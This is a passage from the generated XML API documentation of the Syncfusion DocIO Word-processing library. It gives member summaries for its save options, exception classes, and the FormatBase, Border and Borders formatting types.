            <remarks>This property is not supported in UNIVERSAL,UWP,WP and Xamarin application.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SaveOptions.HtmlExportTextInputFormFieldAsText">
            <summary>
            Gets or sets a value indicating whether to export text input form field as text.
            </summary>
            <value><b>True</b> if HTML export text input form field as text; otherwise, <b>false</b>.
            </value>
            <remarks>By default, the text form fields are preserved as editable fields while exporting the HTML file. 
            </remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SaveOptions.HtmlExportOmitXmlDeclaration">
            <summary>
            Gets or sets value indicating whether to omit XML declaration in the exported HTML file.
            </summary>
            <value>
            <b>True</b> if Omit XML declaration in the exported HTML file; 
            <b>false</b> otherwise. Default value is false.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SaveOptions.MaintainCompatibilityMode">
            <summary>
            Gets or sets a value indicating whether to preserve compatibility mode as in the input Word document.
            </summary>
            <value>
            <b>True</b> if to have the compatibility mode as preserved in the input document;
            <b>false</b> if to have the compatibility mode based on the save format type.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.CssStyleSheetType">
            <summary>
            Specifies the Css style sheet type.
            </summary>
            <remarks>This property is not supported in MVC6 and Xamarin applications.</remarks>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CssStyleSheetType.External">
            <summary>
            Specifies External sheet type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CssStyleSheetType.Internal">
            <summary>
             Specifies Internal sheet type.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DLSException">
            <summary>
            Represents general exception in DLS library.
            </summary>  
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DLSException.DEF_MESSAGE">
            <summary>
            Default exception message.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DLSException.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.DLSException"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DLSException.#ctor(System.Exception)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.DLSException"/> class with specified inner exception.
            </summary>
            <param name="innerExc">The inner exception that occurs during execution.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DLSException.#ctor(System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.DLSException"/> class.
            </summary>
            <param name="message">The <b>string </b> that represents the exception message.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DLSException.#ctor(System.String,System.Exception)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.DLSException"/> class with specified exception message and inner exception.
            </summary>
            <param name="message">The <b>string </b> that represents the exception message.</param>
            <param name="innerExc">The inner exception that occurs during execution.</param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.HtmlConverterRegisterException">
            <summary>
            Represents the Html Converter Register Exception.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HtmlConverterRegisterException.DEF_MESSAGE">
            <summary>
            Default exception message.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HtmlConverterRegisterException.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.HtmlConverterRegisterException"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HtmlConverterRegisterException.#ctor(System.Exception)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.HtmlConverterRegisterException"/> class.
            </summary>
            <param name="innerExc">The inner exc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HtmlConverterRegisterException.#ctor(System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.HtmlConverterRegisterException"/> class.
            </summary>
            <param name="message">The message.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HtmlConverterRegisterException.#ctor(System.String,System.Exception)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.HtmlConverterRegisterException"/> class.
            </summary>
            <param name="message">The message.</param>
            <param name="innerExc">The inner exc.</param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XDLSException">
            <summary>
            Represents exception during xml serialization.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XDLSException.DEF_MESSAGE">
            <summary>
            Default exception message.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XDLSException.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.XDLSException"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XDLSException.#ctor(System.Exception)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.XDLSException"/> class.
            </summary>
            <param name="innerExc">The inner exc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XDLSException.#ctor(System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.XDLSException"/> class.
            </summary>
            <param name="message">The message.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XDLSException.#ctor(System.String,System.Exception)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.XDLSException"/> class.
            </summary>
            <param name="message">The message.</param>
            <param name="innerExc">The inner exc.</param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Border">
            <summary>
            Represents the border formatting options for Word document contents.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.FormatBase">
            <summary>
            Represents the base formatting.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FormatBase.MAXPARENTLEVEL">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FormatBase.MAXKEY">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FormatBase.m_propertiesHash">
            <summary>
            Member to hold the collection of properties values and its keys.
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FormatBase.m_baseFormat">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FormatBase.m_parentFormat">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FormatBase.m_compositeKey">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FormatBase.m_parentLevel">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FormatBase.m_bFlags">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FormatBase.m_propsUpdateFlags">
            <summary>
            Member to hold the collection of updated properties.
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FormatBase.m_sprms">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.#ctor(Syncfusion.DocIO.DLS.IWordDocument,System.Boolean)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> class.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
            <param name="isTextBox">To represent textbox instance</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> class.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.#ctor(Syncfusion.DocIO.DLS.IWordDocument,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> class.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
            <param name="owner">The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> that is the owner of the current item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.#ctor(Syncfusion.DocIO.DLS.FormatBase,System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> class.
            </summary>
            <param name="parentFormat">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> that represents the parent format.</param>
            <param name="parentKey">The <b>integer</b> that represents the parent key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.#ctor(Syncfusion.DocIO.DLS.FormatBase,System.Int32,System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> class.
            </summary>
            <param name="parent">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> that represents the parent format.</param>
            <param name="parentKey">The <b>integer</b> that represents the parent key.</param>
            <param name="parentOffset">The <b>integer</b> that represents the parent offset.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.ImportContainer(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Imports the container.
            </summary>
            <param name="format">The format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.ImportMembers(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Imports the members.
            <exclude/>
            </summary>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.ApplyBase(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            
            </summary>
            <param name="baseFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.HasKey(System.Int32)">
            <summary>
            Returns the value indicating whether the key exists in the properties collection.
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>
            	<b>True</b> if the specified key is present, otherwise <b>false</b>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.HasBoolKey(System.Int32)">
            <summary>
            Returns a value indicating whether the key exists and its corresponding boolean value.
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>
            <b>True</b>	if the specified key is present with its boolean value, otherwise <b>false</b>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.ClearFormatting">
            <summary>
            Clears the formatting.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.SetPropUpdateFlag(System.Int32)">
            <summary>
            Sets the flag that defines that current property was updated.
            <exclude/>
            </summary>
            <param name="propKey">The <b>integer</b> that specifies the key of the property.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.IsPropertyUpdated(System.Int32)">
            <summary>
            Returns a value indicating whether the specified property was set before.
            <exclude/>
            </summary>
            <param name="propertyKey">The <b>integer</b> that specifies the key of the property.</param>
            <returns><b>True</b> if the property is set, otherwise <b>false</b>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.CheckUpdateFlagsColl">
            <summary>
            Checks the updated properties flags collection.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.SetComplexBoolValue(System.Int16,System.Byte)">
            <summary>
            Sets complex boolean value.
            </summary>
            <param name="propKey">The prop key.</param>
            <param name="val">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.GetDefValue(System.Int32)">
            <summary>
            Returns the default values.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>An object that specifies the default value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.GetDefComposite(System.Int32)">
            <summary>
            Gets the composite values.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.OnChange(Syncfusion.DocIO.DLS.FormatBase,System.Int32)">
            <summary>
            Occurs on format change.
            <exclude/>
            </summary>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
            <param name="propKey">The <b>integer</b> that represents the property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.HasValue(System.Int32)">
            <summary>
            
            </summary>
            <param name="propertyKey"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.GetSprmOption(System.Int32)">
            <summary>
            Gets the Single Property Modifier Record option value for the specified property.
            <exclude/>
            </summary>
            <param name="propertyKey">The <b>integer</b> that represents the property key.</param>
            <returns>The <b>integer</b> that represents the SPRM value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.EnsureComposites">
            <summary>
            Ensures the composites.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.EnsureComposites(System.Int32[])">
            <summary>
            Ensures the composites.
            </summary>
            <param name="keys">The keys of the properties.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.GetBaseKey(System.Int32)">
            <summary>
            Returns the key of the base format.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> which specifies the key.</param>
            <returns>The key of the parent format.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.GetFullKey(System.Int32)">
            <summary>
            Returns the whole key.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>The entire key.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.GetDefComposite(System.Int32,Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Returns the default composite value.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <param name="value">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> element.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.MarkNoDefault">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.RemoveChanges">
            <summary>
            Removes the format changes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.AcceptChanges">
            <summary>
            Accepts the changes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.GetStyleChangeOption">
            <summary>
            Gets the style change option.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.GetChangeOption">
            <summary>
            Gets the change option.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.RemovePositioning">
            <summary>
            Removes the positioning.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.Compare(System.Int32,Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Compares the particular property value with the formatbase property value
            </summary>
            <param name="propertyKey">The property key.</param>
            <param name="format">The format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.Compare(System.Object,System.Object)">
            <summary>
            Compares the proprerty value of one format with another format.
            </summary>
            <param name="value">The value.</param>
            <param name="currentValue">The current value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.GetARGBCode(System.Drawing.Color)">
            <summary>
            Gets the ARGB color code
            </summary>
            <param name="color">The color</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.CopyProperties(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Copies property hash.
            </summary>
            <param name="format">The format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.GetCompositeParentKey(System.Int32,System.Int32)">
            <summary>
            Gets the composite parent key.
            </summary>
            <param name="key">The key.</param>
            <param name="parentLevel">The parent level.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.UpdateProperties(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Updates the properties.
            </summary>
            <param name="format">The format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.CopyFormat(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Copies the format.
            </summary>
            <param name="format">The format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.CheckCharacterStyle(System.Int32)">
            <summary>
            Checks the char style.
            </summary>
            <param name="key">The key.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.GetBaseFormatValue(System.Int32)">
            <summary>
            Gets the base format value.
            </summary>
            <param name="key">The key.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.UpdateFormat(System.Int32)">
            <summary>
            Updates the format.
            </summary>
            <param name="key">The key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FormatBase.CompareArray(System.Byte[],System.Byte[])">
            <summary>
            Compares the array.
            </summary>
            <param name="buffer1">The buffer1.</param>
            <param name="buffer2">The buffer2.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FormatBase.IsDefault">
            <summary>
            Gets / sets whether format is default.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FormatBase.PropertiesHash">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FormatBase.BaseFormat">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FormatBase.Item(System.Int32)">
            <summary>
            Gets or sets the value for the property with specified key.
            <exclude/>
            </summary>
            <param name="key">The key for the property.</param>
            <returns>An object with the specific key.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.FormatBase.ParentFormat">
            <summary>
            Gets parent format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Border.ColorKey">
            <summary>
            Variable used to hold the ColorKey.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Border.BorderTypeKey">
            <summary>
            Variable used to hold the BorderTypeKey.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Border.LineWidthKey">
            <summary>
            Variable used to hold the LineWidthKey.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Border.SpaceKey">
            <summary>
            Variable used to hold the SpaceKey.
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Border.ShadowKey">
            <summary>
            Variable used to hold the ShadowKey.
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Border.HasNoneStyleKey">
            <summary>
            Variable used to hold the HasNoneStyleKey.
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Border.m_borderPosition">
            <summary>
            Indicate border position
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Border.m_bFlags">
            <summary>
            Document is presently read
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.#ctor(Syncfusion.DocIO.DLS.FormatBase,System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Border"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> and key.
            </summary>
            <param name="parent">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object that represents the base formatting options.</param>
            <param name="baseKey">The <b>integer</b> that specifies the base key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.CopyBorderFormatting(Syncfusion.DocIO.DLS.Border)">
            <summary>
            Clones the Border formatting.
            </summary>
            <param name="sourceBorder"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.UpdateTableCells">
            <summary>
            Update table calls border
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.GetLineWeight">
            <summary>
            Gets the line weight.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.GetLineNumber">
            <summary>
            Gets the line number.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.GetStylePriority">
            <summary>
            Gets the style priority.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.GetBorderLineWidthArray(Syncfusion.DocIO.DLS.BorderStyle,System.Single)">
            <summary>
            Gets the border line array.
            </summary>
            <param name="borderType">Type of the border.</param>
            <param name="lineWidth">Width of the line.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.UpdateAroundCell(Syncfusion.DocIO.DLS.WTable,Syncfusion.DocIO.DLS.Borders,System.Int32,System.Int32)">
            <summary>
            Update table cell borders
            </summary>
            <param name="table">Table</param>
            <param name="row">Row index</param>
            <param name="cell">Cell index</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.UpdateAruondRow(Syncfusion.DocIO.DLS.WTable,System.Int32)">
            <summary>
            Update table row borders
            </summary>
            <param name="table">Table</param>
            <param name="row">Row index</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.SetBorderStyle(Syncfusion.DocIO.DLS.BorderStyle)">
            <summary>
            Set the style of the border
            </summary>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.SetDefaultProperties">
            <summary>
            Sets the default properties.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.Compare(Syncfusion.DocIO.DLS.Border)">
            <summary>
            Compares the border properties.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.InitFormatting(System.Drawing.Color,System.Single,Syncfusion.DocIO.DLS.BorderStyle,System.Boolean)">
            <summary>
            Initializes the Border style.
            </summary>
            <param name="color">The <see cref="T:System.Drawing.Color"/> for the border.</param>
            <param name="lineWidth">The <b>float</b> that specifies width of the line.</param>
            <param name="borderType">The <see cref="T:Syncfusion.DocIO.DLS.BorderStyle"/> member that specifies the style for border.</param>
            <param name="shadow"><b>True</b> if shadow should be drawn, otherwise <b>false</b>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.GetDefValue(System.Int32)">
            <summary>
            Returns the default values.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>An object that specifies the default value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.OnChange(Syncfusion.DocIO.DLS.FormatBase,System.Int32)">
            <summary>
            Occurs on format change.
            <exclude/>
            </summary>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
            <param name="propertyKey">The <b>integer</b> that represents the property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.ApplyBase(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Apply base style
            </summary>
            <param name="baseFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Border.UpdateSourceFormatting(Syncfusion.DocIO.DLS.Border)">
            <summary>
            Updates the source formatting.
            </summary>
            <param name="border">The border.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Border.IsRead">
            <summary>
            Document is presently read
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Border.IsHTMLRead">
            <summary>
            Gets or sets a value indicating the opening of HTML
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Border.BorderPosition">
            <summary>
            Get/set border position value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Border.Color">
            <summary>
            Gets or sets the color for border.
            </summary>
            <value>The <see cref="T:System.Drawing.Color"/> for border.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Border.LineWidth">
            <summary>
            Gets or sets the width of the border measured in points.
            </summary>
            <value>The <b>float</b> that represents the width of the border.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Border.BorderType">
            <summary>
            Gets or sets style of the border.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.BorderStyle"/> member that specifies the style for border.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Border.Space">
            <summary>
            Gets or sets the width(in points) of space to maintain between border and text within border.
            </summary>
            <value>The <b>float</b> that specifies the width of the space measured in points.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Border.Shadow">
            <summary>
            Gets or sets a value indicating whether the border should be drawn with shadow.
            </summary>
            <value><b>True</b> if shadow should be drawn; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Border.HasNoneStyle">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Border.IsBorderDefined">
            <summary>
            Gets a value indicating whether border is defined.
            </summary>
            <value>
            	<c>true</c> if border is defined; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Border.BorderPositions">
            <summary>
            Specifies the border position.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Border.BorderPositions.Left">
            <summary>
            Left border
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Border.BorderPositions.Top">
            <summary>
            Top border
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Border.BorderPositions.Right">
            <summary>
            Right border
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Border.BorderPositions.Bottom">
            <summary>
            Bottom border
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Border.BorderPositions.Vertical">
            <summary>
            Vertical border
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Border.BorderPositions.Horizontal">
            <summary>
            Horizontal border
            </summary>    
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Border.BorderPositions.DiagonalDown">
            <summary>
            Diagonal Down border
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Border.BorderPositions.DiagonalUp">
            <summary>
            Diagonal Up border
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Borders">
            <summary>
            Represents the collection of <see cref="T:Syncfusion.DocIO.DLS.Border"/> that includes top, bottom, right and left borders.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Borders.LeftKey">
            <summary>
            Constant value for left key.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Borders.TopKey">
            <summary>
            Constant value for top key.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Borders.BottomKey">
            <summary>
            Constant value for bottom key.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Borders.RightKey">
            <summary>
            Constant value for right key.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Borders.VerticalKey">
            <summary>
            constant value for vertical key.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Borders.HorizontalKey">
            <summary>
            constant value for horizontal key.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Borders.DiagonalDownKey">
            <summary>
            constant value for diagonal down key.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Borders.DiagonalUpKey">
            <summary>
            constant value for diagonal up key.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Borders.m_currTableCell">
            <summary>
            Current table cell
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Borders.m_currTableRow">
            <summary>
            Current table row
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Borders.#ctor(Syncfusion.DocIO.DLS.FormatBase,System.Int32)">
            <summary>
            Initializing constructor.
            </summary>
            <param name="parent">The parent.</param>
            <param name="baseKey">The base key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Borders.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Borders"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Borders.#ctor(Syncfusion.DocIO.DLS.Borders)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Borders"/> class.
            </summary>
            <param name="borders">The <see cref="T:Syncfusion.DocIO.DLS.Borders"/>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Borders.EnsureComposites">
            <summary>
            Ensures the composites.
            </summary>        
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Borders.GetDefValue(System.Int32)">
            <summary>
            Returns the default values.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>An object that specifies the default value.</returns>
            <exception cref="T:System.ArgumentException">The key is invalid.</exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Borders.GetDefComposite(System.Int32)">
            <summary>
            Gets the composite values.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
